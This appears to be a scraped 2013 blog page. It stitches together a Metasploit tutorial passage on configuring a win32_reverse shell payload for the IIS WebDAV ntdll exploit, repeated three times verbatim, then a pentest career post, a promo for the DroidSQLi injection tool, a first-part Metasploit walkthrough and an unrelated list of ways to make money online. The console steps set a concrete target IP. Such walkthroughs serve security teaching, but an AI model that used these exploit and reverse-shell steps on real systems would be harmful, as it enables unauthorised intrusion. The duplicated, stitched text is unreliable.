Monday, May 27, 2013

What do we want a successful attack to do?

What Metasploit calls a payload, many others refer to as shell code or opcode. This is the code that we
wish to have inserted directly into the buffer that we are overflowing. In most cases the shell code is going
to be service pack dependent, OS dependent, and architecture (i386) dependent as well. This means that
most of the payloads in the Metasploit framework will work for only certain OS and on certain processors.
Even if you select an appropriate payload you will have to configure options to get the payload to work.
The most frequently used type of shell code is code that generates a reverse shell from the compromised
system back to the attacking system. Using the stubs mentioned before in the exploits section also apply to
the payloads section. If you type: show payloads

You should see a response like the below.

msf iis50_webdav_ntdll > show payloads
Metasploit̢㢠Framework Usable Payloads
====================================
win32_bind Windows Bind Shell
win32_bind_dllinject Windows Bind DLL Inject
win32_bind_meterpreter Windows Bind Meterpreter DLL Inject
win32_bind_stg Windows Staged Bind Shell
win32_bind_stg_upexec Windows Staged Bind Upload/Execute
win32_bind_vncinject Windows Bind VNC Server DLL Inject
win32_exec Windows Execute Command
win32_reverse Windows Reverse Shell
win32_reverse_dllinject Windows Reverse DLL Inject
win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject
win32_reverse_stg Windows Staged Reverse Shell
win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute
win32_reverse_vncinject Windows Reverse VNC Server Inject

In this case the best shell to try will be the win32_reverse payload. To do this type: set PAYLOAD win32_reverse

This payload requires some options. These include the exit function, the local host and the local port.
To see these options type: show options

You should see something like the below:

msf iis50_webdav_ntdll(win32_reverse) > show options
Exploit and Payload Options
===========================
Exploit: Name Default Description
-------- ------ ----------- ------------------
optional SSL Use SSL
required RHOST 67.36.70.19 The target address
required RPORT 80 The target port
Payload: Name Default Description
-------- -------- ------- ------------------------------------------
required EXITFUNC seh Exit technique: "process", "thread", "seh"
required LHOST Local address to receive connection
required LPORT 4321 Local port to receive connection
Target: Windows 2000 Bruteforce

To set the missing options, we will use the set command like above. Before we can set these values we
need to know what they are. To find your local IP address open another shell window, by either right
clicking on the desktop or (if your CD has this option) look for the computer icon in the program bar. If you
right click on the desktop look for the shell option. If you do this step right you should see a new shell box
(this is like a DOS command prompt box on XP) appear.

Once you have the box open type: ifconfig

This will show the information for all of the interfaces for you Linux system. This is the equivalent of the
ipconfig command in Windows. What you can expect after typing 'ifconfig'?... 
What do we want a successful attack to do?

What Metasploit calls a payload, many others refer to as shell code or opcode. This is the code that we
wish to have inserted directly into the buffer that we are overflowing. In most cases the shell code is going
to be service pack dependent, OS dependent, and architecture (i386) dependent as well. This means that
most of the payloads in the Metasploit framework will work for only certain OS and on certain processors.
Even if you select an appropriate payload you will have to configure options to get the payload to work.
The most frequently used type of shell code is code that generates a reverse shell from the compromised
system back to the attacking system. Using the stubs mentioned before in the exploits section also apply to
the payloads section. If you type: show payloads

You should see a response like the below.

msf iis50_webdav_ntdll > show payloads
Metasploit̢㢠Framework Usable Payloads
====================================
win32_bind Windows Bind Shell
win32_bind_dllinject Windows Bind DLL Inject
win32_bind_meterpreter Windows Bind Meterpreter DLL Inject
win32_bind_stg Windows Staged Bind Shell
win32_bind_stg_upexec Windows Staged Bind Upload/Execute
win32_bind_vncinject Windows Bind VNC Server DLL Inject
win32_exec Windows Execute Command
win32_reverse Windows Reverse Shell
win32_reverse_dllinject Windows Reverse DLL Inject
win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject
win32_reverse_stg Windows Staged Reverse Shell
win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute
win32_reverse_vncinject Windows Reverse VNC Server Inject

In this case the best shell to try will be the win32_reverse payload. To do this type: set PAYLOAD win32_reverse

This payload requires some options. These include the exit function, the local host and the local port.
To see these options type: show options

You should see something like the below:

msf iis50_webdav_ntdll(win32_reverse) > show options
Exploit and Payload Options
===========================
Exploit: Name Default Description
-------- ------ ----------- ------------------
optional SSL Use SSL
required RHOST 67.36.70.19 The target address
required RPORT 80 The target port
Payload: Name Default Description
-------- -------- ------- ------------------------------------------
required EXITFUNC seh Exit technique: "process", "thread", "seh"
required LHOST Local address to receive connection
required LPORT 4321 Local port to receive connection
Target: Windows 2000 Bruteforce

To set the missing options, we will use the set command like above. Before we can set these values we
need to know what they are. To find your local IP address open another shell window, by either right
clicking on the desktop or (if your CD has this option) look for the computer icon in the program bar. If you
right click on the desktop look for the shell option. If you do this step right you should see a new shell box
(this is like a DOS command prompt box on XP) appear.

Once you have the box open type: ifconfig

This will show the information for all of the interfaces for you Linux system. This is the equivalent of the
ipconfig command in Windows. What you can expect after typing 'ifconfig'?... 
What do we want a successful attack to do?

What Metasploit calls a payload, many others refer to as shell code or opcode. This is the code that we
wish to have inserted directly into the buffer that we are overflowing. In most cases the shell code is going
to be service pack dependent, OS dependent, and architecture (i386) dependent as well. This means that
most of the payloads in the Metasploit framework will work for only certain OS and on certain processors.
Even if you select an appropriate payload you will have to configure options to get the payload to work.
The most frequently used type of shell code is code that generates a reverse shell from the compromised
system back to the attacking system. Using the stubs mentioned before in the exploits section also apply to
the payloads section. If you type: show payloads

You should see a response like the below.

msf iis50_webdav_ntdll > show payloads
Metasploit̢㢠Framework Usable Payloads
====================================
win32_bind Windows Bind Shell
win32_bind_dllinject Windows Bind DLL Inject
win32_bind_meterpreter Windows Bind Meterpreter DLL Inject
win32_bind_stg Windows Staged Bind Shell
win32_bind_stg_upexec Windows Staged Bind Upload/Execute
win32_bind_vncinject Windows Bind VNC Server DLL Inject
win32_exec Windows Execute Command
win32_reverse Windows Reverse Shell
win32_reverse_dllinject Windows Reverse DLL Inject
win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject
win32_reverse_stg Windows Staged Reverse Shell
win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute
win32_reverse_vncinject Windows Reverse VNC Server Inject

In this case the best shell to try will be the win32_reverse payload. To do this type: set PAYLOAD win32_reverse

This payload requires some options. These include the exit function, the local host and the local port.
To see these options type: show options

You should see something like the below:

msf iis50_webdav_ntdll(win32_reverse) > show options
Exploit and Payload Options
===========================
Exploit: Name Default Description
-------- ------ ----------- ------------------
optional SSL Use SSL
required RHOST 67.36.70.19 The target address
required RPORT 80 The target port
Payload: Name Default Description
-------- -------- ------- ------------------------------------------
required EXITFUNC seh Exit technique: "process", "thread", "seh"
required LHOST Local address to receive connection
required LPORT 4321 Local port to receive connection
Target: Windows 2000 Bruteforce

To set the missing options, we will use the set command like above. Before we can set these values we
need to know what they are. To find your local IP address open another shell window, by either right
clicking on the desktop or (if your CD has this option) look for the computer icon in the program bar. If you
right click on the desktop look for the shell option. If you do this step right you should see a new shell box
(this is like a DOS command prompt box on XP) appear.

Once you have the box open type: ifconfig

This will show the information for all of the interfaces for you Linux system. This is the equivalent of the
ipconfig command in Windows. What you can expect after typing 'ifconfig'?... 

Network Penetration Testing or Application Security Assessment – Where to start from?

ethical-hackerThere have been lot of similar questions regularly being posted to us by aspiring information security experts. In the interest of our future penetration testers or information security consultants to enter the industry with the required expertise and also answering to online queries, we made this blog entry.
There are many training companies in India alone which run training programs on network penetration testing or application security assessment. There are both good and bad training companies and it is left to the candidates to research and select the right company. But more importantly, apart from class room training, it is much required for the aspiring information security experts to self-practice in their home lab. environment. After all, practice makes a man perfect! And certainly, boys need more practice than a man!
Jokes apart, in the past 7 years of establishing our company, we have interviewed many fresh candidates who attended multiple courses in penetration testing or/and application security, but due to no or less self-practice, most of them were not able to think and solve practical scenarios. Until the time of writing this blog, we run very limited and exclusive training sessions that too for government agencies, corporate and groups only and normally suggest our participants to pick one of these two domains in the beginning i.e. network penetration testing or application security testing and move step-by-step. Once the expertise is built over one domain, it should be convenient to start with the second but not together. Jack of all, is only known as Jack, people still call them master of none!
But the question then comes, which domain to pick first or the easy one to start with?
The answer is simple, if not straight forward, though with pros and cons as listed below:

Pros

Network Penetration Testing

  1. Easy to start with since most of it is based on automated tools
  2. Nearly 70% of tasks can be handled by automated tools and most of those come with easy to use GUI
  3. With MCSE, RHCE, CCNA background, testing appear to be easy

Application Security Testing

  1. Easy to setup testing environment in limited resources
  2. Limited protocols and number of application attacks make it quick to learn the domain
  3. With moderate knowledge of any web programming (PHP, .Net, J2EE, Rails, etc.), testing goes easy

Cons

Network Penetration Testing

  1. A deep understanding of networking (OSI, TCP/IP), protocols (HTTP, FTP, SMTP, LDAP, etc.), operating systems (Linux, Windows, etc.) is required. 0-days/Custom exploits, social engineering and client side attacks are domains in itself, better not to mix in the beginning. Its learned automatically as the time and experience goes, keeping in mind there was interest to learn
  2. Understanding of various enterprise network components, architectures and deployments are required which comes with experience or taking extensive testing exercises
  3. Setting up a lab. with bunch of vulnerable/mis-configured machines requires considerable computing power, time to install or bandwidth to download vulnerable virtual machines available online
  4. Setting up a real device (firewall, IPS, VPN, Switch, etc.) is even more expensive

Application Security Testing

  1. Depends mostly on manual testing due to limitations of automated tools, need a lot of practice to identify the bugs quickly along with logical approach towards the testing. There comes the human brain!
  2. Need basic knowledge of almost all the programming languages along with different web technologies (SOAP, REST API, AJAX, FLASH), Databases (Sybase, Oracle, MySql, Mongo, etc.), web application firewalls, load balancers, etc. Though, in the beginning start with selected technologies and with good fundamentals, its easy to scale
  3. You will hardly hit the exactly same bug again. Every application is a new application, focus is required more on fundamental concepts than applications or programming languages.
Few points to be considered before pursuing information security as career option:
  1. No training course or trainer can make you penetration testing or application security expert, its only you who wish to be the one by devoting time, energy, dedication and devotion.
  2. Best deal to learn is to create the vulnerable system or application yourself and learn by tweaking the scenarios and attacking
  3. In information security follow “never giveup” approach. If you couldn’t do it, no one else should be able to do it
  4. There is nothing called as 99.999% security, you need to either call it 100% secured or 0% secured. 0.00001% of vulnerability left behind can do the same damage as 100%, so no difference
  5. This is a game of trust, ethics and integrity, if you have lesser courage to carry them, better search another career option. Information security is a small world even on global map, you never know!
  6. Knowledge is in the mind and not on the piece of paper which people call as “Certificate”. Focus on knowledge first and then certificates rather than attaining bunch of certificates with no knowledge
I am personally not in the favor of spoiling the hard earned money on attending ethical hacking training. And then cursing the trainer for not covering the important topics or not educating the promised contents. There are more than required contents on this subject available on the Internet, your courage to find those good resources, learning and practicing them, eventually becomes a strength to conquer any situation.
Though, the idea is not to discourage attending the training courses but there has to be a realization amongst the aspirants that information security domain requires more of a self-practice by thinking different scenarios and hitting at it than simply attending classroom style training or gaining a piece of paper to start calling themselves “Blah Certified Ethical Hacker”, whatever.
My next blog entries should help the learners with the technologies to learn in the beginning in a step-by-step approach both in network penetration testing and application security testing domains.

Android App :- Droidsqli
By Shinigami
Description: DroidSQLi is the first automated MySQL Injection tool for Android. It allows you to test your MySQL-based web application against SQL injection attacks.
DroidSQLi supports the following injection techniques:
- Time based injection
- Blind injection
- Error based injection
- Normal injection
Also, please have a look at our online courses
Recent Launch -SecurityTube iOS Security Expert & SecurityTube Linux Assembly Expert (SLAE)

Metasploit: Step-by-step
The steps below are for use with the BackTrack Distro.
For Downloading BackTrack:
http://www.backtrack-linux.org/downloads/
To begin, boot to your CD and pull up a shell window. From there you will need to move to the Metasploit directory. To do this from a command prompt type:
cd pentest/exploits/framework-2.3/
Launch the Metasploit console. To do this, from a command line type the following:
# “. /msfconsole”
Pick which exploit to use!
Once the msfconsole is running, it is time to decide which exploit to attempt against the target system.
Your options here stub from the following commands:
<!--[if !supportLists]-->use
<!--[if !supportLists]-->show
<!--[if !supportLists]--><!--[endif]-->info
The use command will tell the utility exactly which exploit to select.
After "use" configure options:
We’ve selected our exploit, but we are not done yet. We need to set options. These options include the destination IP and the destination port. The options are configured by using the set command. The show advanced command will let you know if there are more options that can be set. Most exploits do not have advanced options:
Start by typing: Show options
This will show you the command requirements to run the exploit.
These include the RHOST (This is the host that we are going to compromise) and the RPORT (this is the port
that the vulnerable function is running on)
To set these options type:
set RHOST <your partner machines IP address>
On the next line type:
set RPORT 80
Is the exploit going to work?
We have a system, we have an exploit. Are we going to be able to compromise the system? Now is the time to find out. To perform the check type: check
This may not work on all exploits. This will see if the server or target appears vulnerable.
If you type: show targets, you should see something like the below:
msf iis50_webdav_ntdll > show targets
Supported Exploit Targets
=========================
0 Windows 2000 Bruteforce
Now you got the base = tomorrow we will publish the second part and you will find out:
What do we want a successful attack to do? We will also show you how to perform such attack 
Stay tuned! 

Thursday, May 23, 2013

10 Different Methods To Make Money Online

Web marketing is one of the biggest source of making money. Weather you are earning online as profession or as part time work. Internet is best way but its not so much easy to survive online Because their are too many ways to make money online but difficult part is, which we have to choose and which is easy to understand and having better earning also.
But Today i decided to discuss about the different online methods. I  already discuss about ways to make money from ads. But these are combine 12 ways for everyone who having less knowledge about web designs or other technical skills. 

1. Cost Per Click ( CPC )

This method is based on earning from click on ads published on your site, web pages, forum or any apps. I have already discuss about cpc in my article about ads. If you want to learn more in details about cpc must read my article about ways to make money from ads.
The following best cost per click networks which offers best rates for every click are 

Google Adsense:-  It one of biggest and popular trusted network by everyone. Google Adsense Offers Highest CPC and CPM rates. But its earning is totally depend on your visitors location and CTR also. It not so easy to get approval of adsense.

Media.net:- This is new network form by partnership of yahoo and bing with media.net. It is good competitor of adsense. It offers good CPC rates as compare to others.

Chitika:- It is also most popular network for CPC. It also offers best revenue from ads but slightly lesser than Adsense

Infolinks:- It is one the best program for text based ads. It offers good revenue for In-text link ads and for other banner ads also.

Bidvertiser:- It is also relative good as compare to others but its is lesser as compare to above programs. But Still it is best one.
  

2. Cost Per Mile ( CPM )

This method is based on earning from every impression made on ads published on your website or blogs. For every 1000 unique impression you will earn money. But difficult task is to choose best network which offers best rates. It is also known as CPM method.
Some best CPM networks are


  • Tribalfusion
  • BrustMedia
  • BuysellAds
  • Valueclickmedia
  • VibrantMedia
  • Adpepper
  • Cpxinteractive
  • MadadsMedia


3. Sell Affiliates Products

Affiliates marketing is commission based program. Means  for every successful sale made buy you. Then you will earn commission. In my recent article i discuss about Bigrock affiliates program which offers commission for every sale of domains and hosting plans. If you want to learn more about affiliates then i suggest you read in  more detail about affiliates program. 
Here are following Best affiliates which offers good commission


  • Google Affiliates
  • ClickBank
  • Commission Junction
  • E-junkie
  • Amazon Affiliates
  • eBay Affiliates
  • DigiResult 
  • FreeLancer


4. Cost Per Action ( CPA )

In this method you will earn money for every successful action done by user which required on that spot. It is just like an affiliates but in this network if their ads about filling any details or subscribing email service or any other . If someone fill details required by ads then you will earn for every successful action.


  • ClickBooth
  • Peerfly
  • CPAWay
  • MaxBounty
  • CPALead
  • NeverBlue
  • Mgcash


5. Earn From Uploading

Their are many programs which based on download program. But in last few years their are many report about increasing spam in these types of programs. It means for every successful download of your file will get earn. some programs are on premium based but some offers free service.
Some trusted download networks are


  • ShareCash.org
  • CashFile.org
  • Uploadables


6. Write For Other Sites

If you are interested in writing online then this is best to make money . If have knowledge about any specific topic or field. Then the best way is to write articles for other services or you can also hire yourself to write for other blogs who want any author for their blogs.
Below Given are Some networks which gave you money to write for them


  • PayPerPost
  • Social Spark 
  • Sponsored Review
  • RevewMe
  • Payu2Blog 


7. Complete Online Surveys

This is one of the effective and easiest way for everyone who want to make money online because it don't required any web knowledge or technical skills.  In this network you have to fill the accurate information for every question ask on survey. This is best way to make side earning for working  2,3 hours on internet.
Some Best survey programs are


  • MySurvey
  • Dollersurvey
  • SurveyMonkey
  • SurveySpot
  • Myview
  • ClearvoiceSurvey
  • Toluna
  • GlobalTestMarket


8. Online Projects / Freelance

It is freelancer job means like data entry jobs. Their are many programs in which you can apply your application or as per rule. Then you have to complete specific project and task. For every successful completing project you will get earn. Their are many programs which are based on freelancer services.
Some Networks which are based on freelancing are below 


  • Microworkers
  • Elance 
  • Fiverr
  • Odesk
  • BreakStudio
  • ConstantContent


9. Selling Products which you own

It is also an effective to way to make money online if you have any product and service which you feel that peoples likes to buy. You can also put your product on online auction which is best idea to earn more. You can also design any product which you own. you can also sell some services or plans online to get earn. 


  • Amazon
  • eBay
  • Quikr
  • OLX
  • Sell.com
  • Gazelle.com


10. Selling Products which you don't own

It just like an affiliates marketing selling any product which you don't owns but you can sell them of any direct advertiser or by using any network. You can also sell spaces on your website or blog for displaying ads of any product. Which help to earn money for every product sale.


  • Amazon Associates
  • ebay
  • Shirtcity
  • CafePress


Above Mentions are 10 different ways to start working online. I try to cover more topics as much as possibles. I hope all the above methods are clear and helpful for everyone to make bright future online you have to do work hark. Their are many other networks related to above categories but i publish those which i feel simplest and best.

/*If you find this article helpful then please don't forget to share it with others also. If you feel anything missing, wrong or find any doubt feel free to share your view in below comment box.*/

Happy Earning..
Enjoy(-_-)